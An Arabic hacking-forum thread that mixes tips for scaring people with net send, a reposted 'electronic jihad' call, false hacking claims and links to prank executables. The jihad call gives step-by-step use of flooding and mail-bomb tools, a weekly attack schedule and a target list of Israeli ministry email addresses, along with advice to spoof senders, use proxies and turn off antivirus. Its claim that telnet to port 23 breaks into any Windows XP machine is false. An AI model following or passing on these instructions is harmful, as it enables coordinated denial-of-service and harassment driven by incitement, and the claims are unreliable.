تعلم الهاكر ممكن تستفيد منة في المستقبل

تعلم الهاكر ممكن تستفيد منة في المستقبل


صفحة 1 من 6 123 ... الأخيرةالأخيرة
النتائج 1 إلى 10 من 53

الموضوع: تعلم الهاكر ممكن تستفيد منة في المستقبل

  1. #1
    هكر مبتديء Array الصورة الرمزية lplp]
    تاريخ التسجيل
    Nov 2009
    المشاركات
    37

    aljyyosh تعلم الهاكر ممكن تستفيد منة في المستقبل



    ارعب اللى انتا بتكلمة بدون برامج
    ________________________________________

    لتخويف الضحيه ومحادثته بدون اى برنامج
    تخيل ، خلال وجودك على الانترنت ، ان تظهر لك رسالة انه تم اختراقك عن طريق فلان ، ما مقدار الدهشة والذهول وفي بعض الاحيان الرعب الذي ستصاب به، وخصوصا لعلمك ان كومبيوترك خالي تماما من الفيروسات ، وانه توجد بجهازك احدث اصدار للفير وول..

    الطريقة بتكون سهلة عن طريق ال net send ، فقط يكفيك معرفة الip بتاع صاحب الكومبيوتر الذي تريد ارسال الرسالة اليه
    والامر يكون من شاشة الcommands ( يمكن فتحها عن طريق start > run ثم كتابة command او cmd)
    الامر يكون net send ip message

    مثلا بفرضا ان الفاير وول بتاعك اعطاك رسالة تحذير بوجود من يريد ان يتسلل الى جهازك ، وطبيعي ان الفاير وول سيمدك برقم الip لهذا المتسلل ، وليكن مثلا 216.26.109.138
    يمكننا ان نرعب هذا المتسلل ونكتب في الكوماندز الامر التالي
    net send 216.26.109.138 dont mess with my stuff , thanks for calling

    الnet send هو امر من اوامر net ، ويمكنك استعراض اوامر الnet عن طريق كتابة net help ، ومنها اوامر مثل net view و net use يمكن استخدامها في اختراق المنفذ 139

    ملحوظة: net send لن تعمل سوى على winxp, win2000 , win nt

    تدمير المواقع اليهوديه.... الجهاد الالكتروني
    ________________________________________


    **بسم الله الرحمن الرحيم**
    "وأعدوا لهم ماستطعتم من قوة و من رباط الخيل ترهبون به عدو الله وعدوكم"
    الجهاد الإلكتروني

    إخواننا في الله ..
    السلام عليكم ورحمة الله و بركاته و الصلاة والسلام على سيدنا محمد و سيد الخلق أجمعين وآله وصحبه
    و من والاه
    اما بعد ....
    تعرفون جميعا أن الحرب الدائرة على أشدها ليست حربا على فلسطين أو بلد معين .. بل دعكم من وسائل الإعلام
    المغرضة و رياء رجال السياسة و الدهاء زعمائنا هداهم الله الى طريق الصواب قبل فوات الأوان ..
    انها حرب اليهود الصهيون على الإسلام .. و لما كانت الحرب على الإسلام .. فقد أصبح الجهاد فرض عين على
    كل مسلم .. وليس فرض كفاية .. بمعنى انك يجب أن تشارك بنفسك .. وربما انت تفكر ماذا تقول لرب العالمين يوم تسأل عن هذا اليوم ..

    أخي المؤمن .. لم تفتك الفرصة بعد , يمكنك المشاركة فعليا في الحرب فلازال هناك دور لك ..
    دمر معلومات عدوك .. شن الهجمات ضد مواقع وعناويين بريد الاستعمار الإسرائيلي الصهيوني.

    والمشاركة غاية في السهولة ولا تحتاج إلى الكثير من الجهد. بل تكفي مبادئ الإنترنت الأساسية للتمكن من المساهمة
    الفعالة

    ولا تعتقد أن مثل هذه الحملات لا فائدة منها ، ضد المواقع الإسرائيلية الصهيوينة. فكثير من العمليات السابقة نجحت على
    بساطة منفذيها وبساطة المعلومات لديهم ( على أمل أن تنجح هذه المجموعة من الهجمات ) .

    علماً بأنه يجب أن نناضل ضد المستعمر الصهيوني بكل الوسائل المتاحة لنا ، وبكافة الطرق ، حتى نستأصل شأفتهم من
    الأراضي المقدسة .

    ورجاء لمن لا يستطيع المساعدة بنفسه أن ينشر هذه الرسالة في كل مكان حتى تتسنى الفرصة لغيرك أن يساعد وتنال
    الأجر بإذن الله .. انسخها في كل المنتديات و أرسلها الى كل مكان as HTML حتى تظهر كما هي أو حتى ضعها
    كما هي في صفحتك الخاصة .. و حسبي الله على كل من يتهاون ...
    --------------------------------------------------


    هذه المجموعة من الهجمات تقسم إلى قسمين:

    1- هجمات لتدمير مواقع إسرائيلية.

    2- هجمات لتدمير عناويين بريدية إسرائيلية هامة.

    ( يمكنك تحميل أي من البرامج المذكورة في الأسفل وقراءة شرح عنها وذلك بالإطلاع على القسم المسمى شرح وتحميل
    البرامج في آخر هذا المقال ).

    --------------------------------------------------


    1- هجمات لتدمير مواقع إسرائيلية

    وهي تقسم إلى قسمين:

    أ- هجمات منظمة باستخدام " برنامج الدرة لإدارة الحرب المعلوماتية "، ( يحدد المواقع المراد الهجوم عليها
    برنامج الدرة بالاعتماد على الخيار المقدم من قبل الجهة المشرفة على مشروعه ).

    ب- هجمات منظمة باستخدام برنامج: " evilping و winsmurf و مجاهدين النت
    و Httpbomber " لتدمير مواقع إسرائيلية ( يحدد المواقع المراد الهجوم عليها موقع فلسطيني عن طريق
    الرسالة الاخبارية التي يوزعها على جميع الأصدقاء والمشتركين وفي معظم المنتديات العربية ).
    -------------------------------------------------
    2- هجمات لتدمير عناويين بريدية إسرائيلية هامة

    تتم بشكل غير منتظم وإنما عن طريق عدة برامج تدمير بريدية هامة،وهي من البرامج التي تم انتقاءها من قبل موقع فلسطيني
    كأفضل برامج تدمير بريد ( البرامج هي: kaboom!3 و aenima و FakeMail )

    وذلك على العناويين التالية:
    ( ملاحظة : قائمة العناويين خاضعة للتحديث المستمر. ويمكن لأي شخص يعرف عنواناً إسرائيلياً أن يشارك معنا
    وذلك بإرسال العنوان مشكوراً إلى [email protected] )

    وزير الاتصالات : [email protected]
    وزير الدفاع : [email protected]
    وزارة التعليم : [email protected]
    وزيرة البيئة : [email protected]
    وزير الاقتصاد : [email protected]
    وزير الخارجية : [email protected]
    وزير الصحة : [email protected]
    وزير الإسكان : [email protected]
    وزير الهجرة : [email protected]
    وزير التجارة والصناعة : [email protected]
    وزير الداخلية : [email protected]
    وزير الامن الداخلي : [email protected]
    وزير العدل : [email protected]
    وزير الراحة والعمل : [email protected]
    وزير البنية التحتية : [email protected]
    وزير الدين اليهودي : [email protected]
    وزير الرياضة والثقافة والعلم : minister@most.g[email protected]
    وزير السياحة : [email protected]
    وزير الاتصالات : [email protected]


    ومن الملاحظ أن اللاحقة الإقليمية للمواقع الإسرائيلية هي: ( gov.il )

    يمكنك باستخدام برامج تدمير البريد إرسال عدد ضخم من الرسائل إلى أي من هذه العناوين، ولا داعي للتقيد بأي وقت
    محدد للهجوم على هذه العناوين، فيكفي أن تقوم بضغط زر أو زرين مرة أو مرتين عند دخولك الإنترنت ومن ثم الانتظار قليلاُ
    حتى يتم بالفعل إغراق وتعطيل عناوين البريد ...
    -------------------------------------------------

    *** شرح العمليات***
    1-هجمات تدمير المواقع الإسرائيلية:

    1- برنامج الدرة لإدارة الحرب المعلوماتية :

    عنوان تحميل البرنامج:

    http://www.geocities.com/falastinys...iles/doraah.zip

    شرح البرنامج:

    هذا البرنامج هو عبارة عن برنامج يقوم بتدمير المواقع الإسرائيلية المحددة من قبل مصمميه مع العلم أن البرنامج لا يكتسب
    قيمته إن لم يكن عدد المستخدمين له في نفس اللحظة، والذين يحاولون جميعاً تدمير نفس العنوان أكثر من 100 مستخدم.

    نرى في واجهة البرنامج إطاراً بعنوان url وفيه عنوان موقع لا يمكن التعديل عليه وهو العنوان الذي تم اختياره أخيراً
    من قبل مصمم البرنامج. وذلك بهدف تدمير هذا العنوان.

    يجب الضغط على كلمة Update في يمين المربع وذلك في أول مرة يتم فيها تشغيل البرنامج وذلك لتحديث الموقع
    ( أي تحديث لآخر عنوان لموقع تم الاتفاق على تدميره ) كما يجب الضغط على هذا الزر في كل مرة يتم فيها تشغيل
    البرنامج تقريبا وذلك كي تظل على اطلاع بعنوان الموقع الذي تشن الهجمة عليه في هذه الأوقات ...

    ونرى أسفل هذا المربع زرين أحدهما بعنوان: Attack والآخر Stop الأول لبدء عملية الهجوم والثاني لإيقافها

    في أقصى اليمين نجد رقمين الأول يدل على عدد المرات التي نجح البرنامج في إرسال قنبلته إلى الموقع
    ( قد يصل عدد المرات إلى 500 دون ملاحظة أي تغير على الموقع وذلك في حال كنت تستخدم هذا البرنامج وحدك
    أي إن لم يكن هناك أحد في مكان ما من العالم يقوم بنفس ما تقوم به أنت في نفس اللحظة ).

    نجد في القسم اليساري من البرنامج وأسفل مربع url مربعاً بعنوان Proxy server وهنا يمكنك وضع
    عنوان الـ Proxy الذي تستخدمه لدخول الإنترنت مع الـ Port في حال وجودهما.

    في أسفل الـ Proxy server يوجد Socks Proxy وهو لبروكس الـ Socks الإصدار
    الخامس على ما يبدو من رقم البورت الإفتراضي ويجب لتفعيل هذا الخيار الضعط على زر Connect through a SOCKS Proxy ومن ثم كتابة الـ Socks Server والـ Socks Port وهو في الحالة الإفتراضية 1080 أما الـ Socks server فهو في الحالة الإفتراضية، وفي حال استخدام برنامج Http - Tunnel هو : ( 127.0.0.1 ) ويفضل استخدام الـ Socks Proxy إن وجد ( أي إن كانت شركة الإنترنت المشترك بها تدعم هذه التقنية) أوإن لم يوجد، فعن طريق برنامج http - tunnel الشهير، وذلك لأن هذا البروكسي أسرع وأكثر فعالية من غيره.

    أما بالنسبة للقسم الأخير من البرنامج وهو القسم اليميني الأسفل فهو يحوي سرعة إرسال الضربات وهو في الوضع
    الإفتراضي 800 Ms يمكنك تقليل هذا الرقم إلى 400 أو 200 عن طريق الزالقة الموجودة إلى يسار الرقم
    وهذا في حال كانت إستجابة الموقع المراد تدميره إلى الضربات كبيرة أي إذا كان الرقم يزداد بسرعة في خانة
    Successوهذا يعني أن الموقع العدو يستقبل الضربات بشكل سريع وفوري ...

    يمكنك الإطلاع على آخر أخبار الحرب عن طريق زر War News ولكن على ما يبدو فهذا البرنامج مهجور من قبل
    أصحابه، لذلك سنقوم نحن بتنظيم العمليات بوساطته خلال ( هجمات رام الله الإباء والشموخ )..

    مخطط العمليات باستخدام برنامج الدرة:

    نقوم كل يوم خميس وجمعة ما بين الساعة 5.00 مساءً والساعة 7.00 مساءً بتوقيت غرينتش بفتح البرنامج والبدء
    بممارسة الهجمات على الموقع المختار في تلك اللحظة وهكذا...
    ------------------------------------------------
    2- برنامج evilping :

    عنوان تحميل البرنامج:

    http://www.geocities.com/falastinys...es/evilping.zip

    شرح البرنامج:

    هذا البرنامج بسيط جدا جدا في الاستخدام فيكفي وضع عنوان الموقع الإسرائيلي في الخانة المكتوب في داخلها
    Microsoft Corporation ( بعد حذف هذه الجملة ) ومن ثم تحديد عدد الضربات المراد إرسالها في
    الخانة المكتوب داخها 5 ومن ثم ضغط زر start sending ping attacks وذلك كي
    يبدأ البرنامج عمله.

    مخطط العمليات باستخدام برنامج evilping :

    بكل بساطة هذا البرنامج لم نتأكد بعد 100 % من فعاليته ولكن أصحابه أكدوا كثيراً عمله بشكل جيد، لذلك لن نقوم
    باستخدام البرنامج بشكل منفصل بل سيكون جزءاً من هجمات برنامج الدرة. أي عندما نستخدم برنامج الدرة أيام الخميس
    والجمعة نقوم بفتح هذا البرنامج ونكتب فيه نفس اسم الموقع المختار من قبل برنامج الدرة وذلك للمساهمة في إرهاق الموقع.

    نذكر أن أيام العمليات هي الخميس والجمعة من الساعة 5.00 مساءً وحتى الساعة 7.00 مساءً بتوقيت غرينتش.
    ------------------------------------------------
    3- برنامج Httpbomber :

    عنوان تحميل البرنامج:

    http://www.geocities.com/falastinys...tpbomber101.zip
    http://www.geocities.com/eljehadfiles/bomber.zip
    http://www.geocities.com/hagamat2002/bomber.zip
    http://www.geocities.com/eljehad1/bomber.zip
    http://www.geocities.com/eljehad/site/bomber.zip


    شرح البرنامج:

    برنامج بسيط وسهل الاستخدام وهو من البرامج التي سيقوم موقع فلسطيني بتحديد الموقع الهدف المراد الهجوم عليه وذلك
    في سبيل تدمير الموقع بيد واحدة لأن البرنامج لن يكون له أي أثر إن لم يكن عدد المستخدمين له على نفس الموقع في نفس
    الوقت أكثر من 100 مستخدم.

    نجد مربعاً في أعلى البرنامج مكتوب بجانبه إلى اليسار Target Site نكتب في هذا المربع عنوان الموقع
    الإسرائيلي المراد الهجوم عليه والذي سيحدده موقع فلسطيني أسبوعياً
    ( يرجى إرسال رسالة إلى العنوان [email protected] تحوي طلب انتسابك إلى قائمة
    (هجمات رام الله الإباء والشموخ) وذلك لإطلاعك أسبوعياً على الموقع الهدف، كما يمكنك قراءة الموقع الهدف من
    خلال المنتديات العربية حيث ينشر الخبر في معظمها، كما يرجى من السادة المستخدمين للإنترنت إرسال اقتراحاتكم بشأن
    تحديد المواقع الإسرائيلية للهجوم عليها ) ..

    بعد كتابة اسم الموقع ننتبه لخيار Use Proxy في حال كنا نرتبط بالإنترنت مع وجود Proxy ومن ثم نكتب
    عنوان الـ Proxy في الحقل Address ورقم البورت في حقل Port

    نختار في قسم Type of attack نوع الضربة ولدينا نوعان هما Normal Request
    وهو نوع عادي من الضربات ينصح باستخدامه. أما النوع الآخر فهو Post Request فهو أكثر تقدماً لكنه
    لم يشهد له بالنجاح دائماً.

    بعد كل هذا نضغط على زر Start لبدء تنفيذ الهجوم...

    بالنسبة لمشكلة البروكسي :

    الإخوة الذين يتصلون بالانترنت عن طريق بروكسي (الذي يكتبونه في خيارات انترنت )
    عليهم وضع البروكسي والبورت الخاص بشركتهم.. والشرح هنا
    http://www.geocities.com/eljehad/exhtt.htm

    أما الإخوة في مصر مثلا الذين لا يتصلون عن طريق البروكسي يمكنهم استخدام أحد هذه البروكسيات
    proxy : bess-proxy3.iu5.org
    port : 7021
    أو
    proxy : bess-proxy2.iu5.org
    port : 7021
    أو
    proxy : bess-proxy1.iu5.org
    port : 7021
    أو
    proxy : 64.108.32.30
    port : 8801
    أو
    proxy : 211.114.196.173
    port : 8081
    ويجب أن يقوم البرنامج بعد الضربات hits
    -----------------------


    4- برنامج مجاهدين النت:
    عنوان تحميل البرنامج:

    http://mypage.ayna.com/drmmm/mojahdin.zip
    http://mypage.ayna.com/drmmm/mojahdin.exe
    TopCities Startup Lab
    شرح البرنامج:

    البرنامج لا يحتاج الى شرح فهو عربي كامل وما عليك الى ان تفتح البرنامج ثم تذهب الى قسم (تدمير المواقع) وتنقر
    على كلمة (دمر الموقع)
    يجب فتح اكثر من نافذة من البرنامج من 5الى10 نوافذ اي قم بتشغيل البرنامج والنقر على ايقونتة اكثر من 5 مرات
    ثم قم بالذهاب الى قسم تدمير المواقع وانقر دمر الموقع في جميع النوافذ التي فتحتها (عملية تكرار)
    ----------------------------------------------
    5- برنامج Winsmurf :

    عنوان تحميل البرنامج:

    http://www.geocities.com/eljehadfiles/smurf.zip
    http://mypage.ayna.com/lnt/winsmurf.zip
    http://www.geocities.com/hagamat2002/smurf.zip
    http://www.geocities.com/eljehad/site/smurf.zip
    شرح البرنامج:

    http://www.home4arab.com/members/is...er6/roor/ws.htm
    او
    http://www.geocities.com/eljehad/exw.htm
    -----------------------------------------------------------
    2- هجمات تدمير العناويين البريدية الإسرائيلية الهامة:

    [ ملاحظة هامة : هذه الهجمات لن تكون منظمة " أي لا يوجد وقت محدد للقيام بها " بل يمكن أي مستخدم فتح
    أحد البرنامج التي سنوردها بعد قليل والقيام بإرسال عدد معين من الرسائل " كلما زاد عددها كان الوضع أفضل "
    إلى أي عنوان إسرائيلي يريده، وذلك بهدف إغراقه وتدميره. وقد قمنا بإيراد عدد من العناوين الإسرائيلية الهامة في الأعلى
    وهي من العناوين التي نفضل شن الهجمات عليها ] ..

    1- برنامج kaboom!3 :

    ( ملاحظة هامة جدا: هذا البرنامج يحوي Trojan hourse وسوف يقوم مضاد الفيروسات لديك بإيقاف
    البرنامج لذلك يجب توقيف مضاد الفيروسات أولاً ثم تشغيل البرنامج لأن الفيروس غير موجه للقضاء على جهازك وإنما يمكن
    إلحاقه بالرسائل التي يرسلها إلى العدو ، لذلك كن مطمئناً لأن البرنامج لن يؤذيك بحال من الأحوال )...

    عنوان تحميل البرنامج:

    http://www.geocities.com/falastinys...les/kaboom3.zip

    شرح البرنامج:

    عند فتح هذا البرنامج تظهر لنا نافذة صغيرة فيها 3 خيارات هي MailBomber ويستخدم لتدمير عنوان البريد
    المطلوب ، وخيار Mailing List والذي يستخدم لإضافة العنوان البريدي المطلوب إلى قوائم إخبارية متعددة
    مما يؤدي إلى أن هذه القوائم ستبدأ بإرسال رسائل بشكل كبير جداً ومزعج لأصحاب البريد هؤلاء أما الخيار الأخير
    فهو Close لإغلاق البرنامج

    الخيار - MailBomber :

    عند الضغط على هذا الزر تظهر لنا نافذة فيها العديد من الحقول، الحقل To نكتب فيه المرسل إليه "عنوان بريدي واحد"
    ( من عناويين بريد الأعداء ) ، الحقل From نكتب فيه اسم المرسل
    ( تأكد ألا تكتب عنوانك الحقيقي ، بل اكتب أي عنوان آخر ويفضل أن يكون من باقي العناوين الإسرائيلية المدرجة في
    القائمة في الأعلى .

    (السبب: مثلاً وزارة السياحة: ستقوم بحجب أي عنوان يقوم بإزعاج بريدها ومنعه من مراسلتها نهائياً ،
    ولكنها لن تستطيع بتاتاً منع عنوان وزارة الخارجية الإسرائيلية، من إرسال رسالة إليها ، وهذا ما نستغله هنا .

    كما أنصح بعدم استخدام نفس العنوان لأكثر من نصف ساعة لأنه سيتم حجبه تلقائياً بل يجب تغيير عنوان المرسل كل
    نصف ساعة أو ربع ساعة وكلما تم تغيير عنوان المرسل أكثر كان الوضع أفضل ).

    الحقل Server نكتب فيه ملقم البريد الذي نستخدمه نحن ويمكن أن يكون Pop mail أو Web mail
    ( فمثلاً في سوريا يمكن وضع هذا العنوان: scs.scs-net.org وهو يستخدم سيرفر الجمعية
    السورية للمعلوماتية في إرسال البريد " كن واثقاً من أن أحداً لن يكتشف فعلتك هذه فهي تتم بسرية 1000 % " )
    كما يمكنك اختيار إحدى السيرفرات الموجودة في القائمة ، كما يمكنك كتابة عنوان سيرفر
    الـ hotmail أو الـ yahoo ....

    في حقل Priority والذي يعني ( أهمية الرسالة )، أؤكد على وضع الخيار High وذلك لاستقبال رسالتك
    على أنها ( شديدة الأهمية ) فيكون لها أفضلية على غيرها من الرسائل.

    في حقل Subject اكتب أي اسم كان وأي مجموعة من الحروف وهي ستكون عنوان الرسائل المرسلة.

    بالنسبة لحقل Message Body وهو نص الرسالة، أطلب منكم الآن أن تدعونا نرى شطارتكم، فكلما كانت
    الرسالة أطول ولا تعني شيئاً كان الوضع أفضل، فمثلاً يمكن أن تكون الرسالة عبارة عن 100 سطر من حرف الـ A
    أو أية خربشة أخرى ، كما يمكن وضع عبارات التنديد والتهديد للعدو الصهيوني باللغة الإنكليزية.

    يمكن وضع إشارة صح عند Cc وكتابة عنوان إسرائيلي آخر في الحقل الفارغ وذلك كي يتم مشاركة هذا العنوان بالهجوم.

    في خانة Number Of Messages ضع عدد الرسائل التي تريد إرسالها إلى العنوان المذكور
    أو اختر mail Perpetually وذلك كي يبدأ بإرسال عدد من الرسائل غير منتهي حتى يتم إيقاف البرنامج.

    بعد كل هذا اضغط زر Send وتابع العداد الذي يظهر في أعلى يمين البرنامج وهو يشيير إلى عدد الرسائل التي وصلت

    الخيار Maling Lists:

    عند الضعط على هذا الزر تظهر لك نافذة قم بوضع إشارة صح في جميع المربعات وذلك كي يتم إشراك عنوان بريد العدو
    بكل هذه القوائم البريدية.

    املأ الآن الحقول:

    Address عنوان بريد العدو.

    Name ضع هنا اسماً لا على التعيين.

    Server تم شرح هذا المصطلح واستخدامه سابقاً.

    ثم اضغط زر Subscribe حتى يتم البدء. ويريك العداد الموجود أسفل حقل : Server
    عدد النشرات التي بقيت حتى يتم إشراك العنوان بها.
    --------------------------------------------
    2- برنامج aenima :
    ( هذا البرنامج من أقوى برامج تدمير البريد ).

    عنوان تحميل البرنامج:

    http://www.geocities.com/falastinys...es/aenima20.zip

    شرح البرنامج:

    بعد فتح البرنامج تظهر لك رسالة في وسطها زر Ok غير واضح المعالم ، اضغط عليه ليتم فتح النافذة الرئيسية للبرنامج.

    البرنامج مقسوم إلى خمس مراحل يقوم المستخدم خلالها بتعبئة حقول عديدة حتى يصل إلى مرحلة البدء بإرسال الرسائل
    ويتميز هذا البرنامج بقدرته وسرعته العجيبة على تدمير البريد المعادي.

    القسم الأول من البرنامج هو Mail Delivery نقوم فيه بكتابة اسم المرسل وعنوانه والعنوان الذي سترسل
    إليه الردود ( طبعاً هذه المعلومات يجب أن تكون غير صحيحة ).

    ثم نكتب اسم المرسل إليه وليس من الضرورة أن يكون صحيحاً. ومن ثم عنوانه البريدي الصحيح.
    كما يمكننا في حقلي Carbon Copy و Blind Carbon Copy وضع عنوانين بريديين آخرين
    لتدميرهما بنفس الوقت ( بإرسال نفس الرسالة لهما ) .

    بعد تعبئة هذه البيانات ننتقل إلى القسم Mail Options وفيه يمكننا تحديد عدد الرسائل في القسم اليساري
    العلوي من البرنامج أو اختيار Bomb Until Stopped وذلك للبدء بإرسال عدد لا منتهي من الرسائل
    ينقطع عند توقيف البرنامج ، في حقل Smtp Server نكتب اسم السيرفر كما سبق وأشرنا,

    باقي خيارات هذه الصفحة ليست عظيمة الأهمية.

    ثم ننتقل إلى القسم Header الذي يستخدم لتحديد التاريخ وما شابه من أشياء تظهر لدى المرسل إليه وليس من
    الضروري تعبئة هذه الحقول.

    ثم القسم Message وفيه نقوم بكتابة عنوان الرسالة ونصها

    ثم نضغط قسم Send ثم زر Start فيبدأ العداد على اليمين بعد الرسائل التي تم إرسالها إلى العدو..
    ---------------------------------------------
    3- برنامج FakeMail :

    عنوان تحميل البرنامج:

    http://www.geocities.com/falastinys...es/fakemail.zip

    شرح البرنامج:

    هذا البرنامج بسيط جدا فقط افتحه ثم ضع اسم المرسل وعنوانه ( الوهمي طبعاً ).ثم عنوان المرسل إليه ثم عنوان
    الرسالة وفي النهاية الرسالة. ومن ثم اضغط على القسم Server وضع اسم ،Server واسم مستخدم وهمي،
    ثم اضغط زر Send حتى يبدأ البرنامج بإرسال الرسالة بشكل متكرر حتى يتم إيقافه.
    -------------------------------------------------

    نداء خاص : أرجو أن تحكم ضميرك قبل أن تستخدم المعلومات الواردة في هدف غير الجهاد ..
    تذكر أن الله يراك و تذكر أنك ستسأل عما فعلت حين أتيحت لك الفرصة .. هل شاركت ؟ هل أتحت الفرصة لغيرك
    أن يشارك ؟ أم هل استخدمت العلم في هدف آخر ؟

    منقول معرفش منين
    بس يا ريت كلنا نشارك

    الحماية الذاتية
    ________________________________________

    الحماية الذاتية ومعرفة اذا كان جهاز محمل بي patch ام لا
    الطريقة الأولي : بواسطة ملف تسجيل النظام Registry :

    1-أنقر على إبداء Start
    2- أكتب في خانة التشغيل Run الأمر : rigedit
    3- إفتح المجلدات التالية حسب الترتيب في قائمة Registery Editor :
    - HKEY_LOCAL_MACHINE
    - Software
    - Microsoft
    - Windows
    - Current Version
    - Run
    4- والآن من نافذة تسجيل النظام Registry Editor انظر الي يمين النافذة بالشاشة المقسومة ستشاهد تحت قائمة Names أسماء الملفات التي تعمل مع قائمة بدء التشغيل ويقابلها في قائمة Data عنوان الملف .
    5- لاحظ الملفات جيدا فإن وجدت ملف لايقابلة عنوان بالـ Data او قد ظهر امامة سهم صغير <--- فهو ملف تجسس إذ ليس له عنوان معين بالويندوز.
    6- تخلص منه بالضغط على الزر الأيمن للفارة ثم Delete


    ================================================== ======


    الطريقة الثانية بواسطة الأمر :msconfig

    1- انقر ابداء Start
    2- اكتب في خانة التشغيل Run الأمر التالي : msconfig
    3- سوف تظهر لك نافذة System Configuration Utility أختر لسان التبويب Start up
    4- ستظهر لك شاشة تعرض البرامج التي تبداء العمل مباشرة مع بدء التشغيل
    5- إفحص هذة البرامج جيدا بالنظر فإن شككت بوجود برامج غريبة لم تقم أنت بتثبيتها بجهازك فقم بالغاء الإشارة الظاهرة بالمربع الصغير المقابل له فتكون بذلك قد اوقفت عمل البرنامج التجسسي او غيره من البرامج الغير مرغوب بها.

    ================================================== ======

    الطريقة الثالثة بواسطة الدوس Dos:
    هذة الطريقة كانت تستخدم قبل ظهور الويندوز وهي من اسهل الطرق :
    1- إفتح الدوس من محث MSDos بقائمة إبداء
    2- أكتب الأمر التالي : C:/Windowsdir patch.*
    3- إن وجدت ملف الباتش فقم بمسحة بالطريقة التالية:
    C:Windowsdelete patch.*

    طريقه لاختراق وندوز اكس بي
    ________________________________________

    سأريكم الان أسهل طريقه لاختراق وندوز اكس بي عن طريق الثغره الخاصه به

    المتطلبات :

    1- برنامج سكانر
    2- التل نت (يمكن تشغيله عن طريق Start --->Run--->TelNet)
    3- وندوز غير نظام اكس بي

    الطريقه :-

    تسوي سكان حق ايبيات فيها ثغره ببورت 23 (وهو بورت الثغره+بورت التل نت)

    ثم تجيب تفتح التل نت وتروح حق Connect ---> Remote system

    راح تطلعلك نافذه صغير في الخانه الاولى :-

    Host name : تكتب الايبي الللي خذيته من السكانر
    والخانه الثانيه :-
    Port : تكتب رقم البورت 23
    و في الخانه الثالثه لاتفعل شيء
    ثم اظغط Connect

    وهنا اخترقت اي جهاز في وندوز اكس بي
    الطريقه فعاله 100%

    مقالب مسنجر !!
    ________________________________________

    بسم الله الرحمن الرحيم

    اذا ما تشتغل الوصله سوها كوبي بيست

    1: يخفى ساعة الويندوز من شريط إبدأ
    http://www.ardra.host.sk/1.zip
    :يخفي الرموز من شريط ابدأ
    http://www.ardra.host.sk/2.zip

    3:يخفي رموز سطح المكتب كلها ... اعمل تحديث تعود كما كانت
    http://www.ardra.host.sk/3.zip

    4:يقوم بايقاف التشغيل في الجهاز
    http://www.ardra.host.sk/4.zip

    5:يخفي شريط ابدأ كليا
    http://www.ardra.host.sk/5.zip

    6:يجعل الماوس ترقص في الشاشة، رائع جدا
    http://www.ardra.host.sk/6.zip 7:هذا يرسل أمر للطابعة بطباعة كلمة فورمات
    http://www.ardra.host.sk/7.zip

    8:يقوم بفتح ال CD_ROM
    http://www.ardra.host.sk/8.zip

    9:يقطع الاتصال بالإنترنت
    http://www.ardra.host.sk/9.zip

    10:يوهمك بأن الشاشة تحترق
    http://www.mixuae.com/e7raq_alshashah.exe

    12:يوهمك بوجود إحد أعظاء الهكر في جهازك
    http://www.mixuae.com/hkr.exe

    13:تسيل الشاشة إلى أسفل
    http://www.mixuae.com/sylan_alshashah.exe

    14:أنتبه......قنبلة موقوته في جهازك
    http://www.mixuae.com/alqonbelah.exe

    15:تظهر لك رسالة تفيد بأن عندك برنامج غير شرعي
    http://www.mixuae.com/brnamaj_mokarsan.zip

    16:يعكس أزرار الماوس مع رسالة إعتذار
    http://www.mixuae.com/3ks_azrar_almaws.exe

    17:يقلب الشاشة رأس على عقب
    http://www.mixuae.com/qalb_alshashah.exe

    18:من أفضل المقالب سيعجبك أكيد
    http://www.mixuae.com/Y2K.exe

    19:يقوم بحبس الماوس لفترة مؤقته يعود بعدها كل شيء كما كان
    http://www.mixuae.com/7bs_almaws.exe

    20:سيشعرك بأن أحد يتجسس عليك
    http://www.mixuae.com/altjss.exe

    21:سيجعل الشاشة تومض بسرعة مما يسبب الصداع
    http://www.mixuae.com/wmeed_alshashah.exe

    22:سيقوم بغلق الجهاز مع رسالة أسف
    http://www.mixuae.com/eghlaq_aljehaz.exe

    23:يعطيك مسألة حسابية ويطلب منك حلها وإلا.......جربه
    http://www.mixuae.com/bo_sb3h.exe

    24:يجعل الماوس أحول لمدة معينه
    http://www.mixuae.com/almaws_ala7wal.exe

    25:يوهمك بأن فيروس حربوش في جهازك
    http://www.mixuae.com/7rbosh.exe

    26:أيقونة إبدأ تقوم بحركات مذهلة
    http://www.mixuae.com/jnon_ebda.exe

    27:يقوم بعمل هزة وارتجاج لسطح المكتب
    http://www.mixuae.com/zlzal_alshashah.exe

    28:سيقوم بعمل داونلود وهمي لأحد الفيروسات
    http://www.mixuae.com/dawnloob_whme.exe

    29:يفتح جميع البرامج الموجودة في الجهاز بشكل جنوني
    http://www.mixuae.com/ente7ar.exe

    30:رجاء لاتجاوب على هذا السؤال بنعم
    http://www.mixuae.com/soial_m7rj.exe

    31:تومض الكيبورت بسرعة وجنون
    http://www.mixuae.com/wamed_alkeyboard.exe

    32:يقوم بحذف الوندوز
    http://www.mixuae.com/7athf_alWindows.exe

    33:يحدث سيلان للشاشة ولا يمكنك السيطرة عليه
    http://www.mixuae.com/fydan_alshashah.exe

    34:تدور الشاشة بـسرعة لدقيقه واحدة ثم يرجع كل شيئ كما كان
    http://www.mixuae.com/dwran_alshashah.exe

    35:يتغير شكل مؤشر الماوس لأشكل كثيرة بسرعة البرق
    http://www.mixuae.com/jnon_almaws.scr

    36:يقوم بحذف سطح المكتب لكن لا تخف ستعود بعد اعادة التشغيل
    http://www.mixuae.com/ms7_albramej.exe

    37:برنامج الظلام مخيف ويغلق عليك الشاشة بالتدريج
    http://www.mixuae.com/aldalam.exe

    38:ينسخ الماوس ويقوم بحركات مذهلة على الشاشة
    http://www.mixuae.com/mawsen.scr

    39:عندما تنتهي من ملأ الجدول ستضحك بشراهة
    http://www.mixuae.com/ed7ak.exe

    40:مجموعة من الحشرات الغريبة تغزوا جهازك
    http://www.mixuae.com/alhasharat.exe41:يغرق جهازك بالماء وهو حافظة شاشة رائعة
    http://www.mixuae.com/e7raq_alshashah.exe

    42:رسالة غرام تتحول إلى رسالة توبيخ
    http://www.mixuae.com/b6aqt_7ob.scr

    43:يقوم بعمل هزة لسطح المكتب لدقيقة واحدة
    http://www.mixuae.com/alzelzal.scr

    45:كل من فتح هذا المقلب أرتعب
    http://www.mixuae.com/alro3b.exe

    46:يفتح ملفات كثيرة يصعب عليك إغلاقها
    http://www.mixuae.com/mlfat.exe

    47:يقوم بتكبير الماوس بشكل خيالي
    http://www.mixuae.com/tkber_almaws.zip

    48:إذا حسيت بتعب وأنت جالس على الجهاز فهذا يريحك واجد
    http://www.mixuae.com/banadol.exe

    اختراق المواقع عن طريق الـ Ftp
    ________________________________________

    اختراق المواقع عن طريق الـ Ftp

    --------------------------------------------------------------------------------

